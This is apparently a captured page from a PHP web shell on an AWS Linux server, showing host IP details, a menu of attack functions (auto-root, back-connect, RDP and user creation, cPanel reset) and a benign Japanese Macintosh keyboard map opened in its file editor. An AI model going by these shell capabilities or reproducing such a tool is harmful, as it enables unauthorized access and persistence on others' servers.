Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.12.102.192
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
X11 /
xkb /
symbols /
macintosh_vndr /
[ HOME SHELL ]
Name
Size
Permission
Action
apple
4.99
KB
-rw-r--r--
ch
3.74
KB
-rw-r--r--
de
3.75
KB
-rw-r--r--
dk
3.43
KB
-rw-r--r--
fi
330
B
-rw-r--r--
fr
5.44
KB
-rw-r--r--
gb
557
B
-rw-r--r--
is
5.58
KB
-rw-r--r--
it
2.68
KB
-rw-r--r--
jp
1021
B
-rw-r--r--
latam
1.87
KB
-rw-r--r--
nl
156
B
-rw-r--r--
no
2.07
KB
-rw-r--r--
pt
2.52
KB
-rw-r--r--
se
2.04
KB
-rw-r--r--
us
4.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jp
// JIS symbol mapping for Apple Aluminium // (Damien Ciabrini <damien.ciabrini@gmail.com>) // // The JIS version of the Aluminium Keyboard is made of // QWERTY-like map for the latin part // PC98-like map for the kana part // EISU and KANA keys found on other Apple keyboards partial default alphanumeric_keys xkb_symbols "usmac" { name[Group1] = "Japan - Macintosh, US map"; include "jp(common)" key <JPCM> { [ KP_Separator ] }; key <AE13> { [ yen, bar ] }; replace key <AE10> { [ 0 ] }; replace key <AB11> { [ underscore ] }; replace key <CAPS> { [ Caps_Lock ] }; }; partial alphanumeric_keys xkb_symbols "mac" { name[Group1] = "Japan - Macintosh"; include "jp(kana)" replace key <CAPS> { [ Caps_Lock ] }; }; partial alphanumeric_keys xkb_symbols "alujiskeys" { // On JIS USB keyboard, EISU and KANA replace Hangul and Hanja // see keycodes macintosh(jisevdev) replace key <HJCV> { [ Hiragana_Katakana ] }; replace key <HNGL> { [ Eisu_toggle ] }; };
Close